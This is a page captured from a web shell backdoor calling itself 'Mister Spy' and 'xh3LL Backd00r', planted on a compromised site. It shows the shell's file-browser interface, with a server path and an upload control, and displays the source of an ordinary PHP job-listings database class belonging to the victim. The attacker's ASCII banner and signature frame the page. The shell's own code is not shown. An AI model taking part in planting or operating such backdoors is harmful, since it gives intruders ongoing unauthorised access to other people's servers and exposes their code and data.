Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/web/library/
Upload File :
Current File : /home/caballoscriollos/www/web/library/class.empleos.php

<?php 

require_once('class.dbaccess.php');
require_once('class.empleo.php');
require_once('class.filter.php');
require_once('class.page.php');
require_once('class.empleosestados.php');

class Empleos extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		if ((isset($filter['Titulo'])) && ($filter['Titulo'] != ''))
			$sql.= " AND e.Titulo LIKE '%" . DB::StringUnquoted($filter['Titulo']) . "%'";
		
		if ((isset($filter['IdEstado'])) && ($filter['IdEstado'] != ''))
			$sql.= " AND e.IdEstado = " . DB::Number($filter['IdEstado']);
		
		if ((isset($filter['IdProvincia'])) && ($filter['IdProvincia'] != ''))
			$sql.= " AND e.IdProvincia = " . DB::Number($filter['IdProvincia']);
		
		if ((isset($filter['IdLocalidad'])) && ($filter['IdLocalidad'] != ''))
			$sql.= " AND e.IdLocalidad = " . DB::Number($filter['IdLocalidad']);
		
		if ((isset($filter['Ubicacion'])) && ($filter['Ubicacion'] != ''))
			$sql.= " AND e.Ubicacion LIKE '%" . DB::StringUnquoted($filter['Ubicacion']) . "%'";
			
		if ((isset($filter['Email'])) && ($filter['Email'] != ''))
			$sql.= " AND e.Email LIKE '%" . DB::StringUnquoted($filter['Email']) . "%'";
			
		if ((isset($filter['FechaHasta'])) && ($filter['FechaHasta'] != ''))
			$sql.= " AND (e.FechaHasta is null OR e.FechaHasta >= " . DB::Date($filter['FechaHasta']) . ")";
			
		return $sql;
		
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT e.*"; 
		$sql.= " FROM tblEmpleos e";
		$sql.= " WHERE IdEstado <> " . DB::Number(EmpleosEstados::Eliminado);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " GROUP BY e.IdEmpleo ";
		$sql.= " ORDER BY e.Fecha DESC, e.Titulo ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oEmpleo = new Empleo();
			$oEmpleo->ParseFromArray($oRow);
			
			array_push($arr, $oEmpleo);
			
			$oRes->MoveNext();
		}	
			
		return $arr;
	}
	

	public function GetById($IdEmpleo)
	{
		$sql = "SELECT e.*";
		$sql.= " FROM tblEmpleos e";
		$sql.= " WHERE e.IdEmpleo = " . DB::Number($IdEmpleo);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oEmpleo = new Empleo();
		$oEmpleo->ParseFromArray($oRow);
		
		return $oEmpleo;		
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT e.*"; 
		$sql.= " FROM tblEmpleos e";
		$sql.= " WHERE IdEstado <> " . DB::Number(EmpleosEstados::Eliminado);
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " GROUP BY e.IdEmpleo ";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(Empleo $oEmpleo)
	{
		$arr = array
		(
			'Fecha' 		=> DB::Date($oEmpleo->Fecha),
			'Titulo' 		=> DB::String($oEmpleo->Titulo),
			'Descripcion' 	=> DB::String($oEmpleo->Descripcion),
			'Ubicacion' 	=> DB::String($oEmpleo->Ubicacion),
			'Email' 		=> DB::String($oEmpleo->Email),
			'IdEstado'		=> DB::Number(EmpleosEstados::Activo),
			'IdProvincia'	=> DB::Number($oEmpleo->IdProvincia),
			'IdLocalidad'	=> DB::Number($oEmpleo->IdLocalidad),
			'Direccion' 	=> DB::String($oEmpleo->Direccion),
			'FechaHasta'	=> DB::Date($oEmpleo->FechaHasta)
		);
		
		if (!$this->Insert('tblEmpleos', $arr))
			return false;
			
		$oEmpleo->IdEmpleo = DBAccess::GetLastInsertId();
			
		return $oEmpleo;
	}
	
	
	public function Update(Empleo $oEmpleo)
	{
		$where = " IdEmpleo = " . DB::Number($oEmpleo->IdEmpleo);
		
		$arr = array
		(
			'Fecha' 		=> DB::Date($oEmpleo->Fecha),
			'Titulo' 		=> DB::String($oEmpleo->Titulo),
			'Descripcion' 	=> DB::String($oEmpleo->Descripcion),
			'Ubicacion' 	=> DB::String($oEmpleo->Ubicacion),
			'Email' 		=> DB::String($oEmpleo->Email),
			'IdEstado'		=> DB::Number($oEmpleo->IdEstado),
			'IdProvincia'	=> DB::Number($oEmpleo->IdProvincia),
			'IdLocalidad'	=> DB::Number($oEmpleo->IdLocalidad),
			'Direccion' 	=> DB::String($oEmpleo->Direccion),
			'FechaHasta'	=> DB::Date($oEmpleo->FechaHasta)
		);
		
		if (!DBAccess::UpdateEntidad('tblEmpleos', $arr, $where))
			return false;
		
		return $oEmpleo;
	}
	

	public function Delete($IdEmpleo)
	{
		if (!DBAccess::$db->Begin())
			return false;
		
		$where = " IdEmpleo = " . DB::Number($IdEmpleo);

		$arr = array('IdEstado'	=> DB::Number(EmpleosEstados::Eliminado));
		
		if (!DBAccess::UpdateEntidad('tblEmpleos', $arr, $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat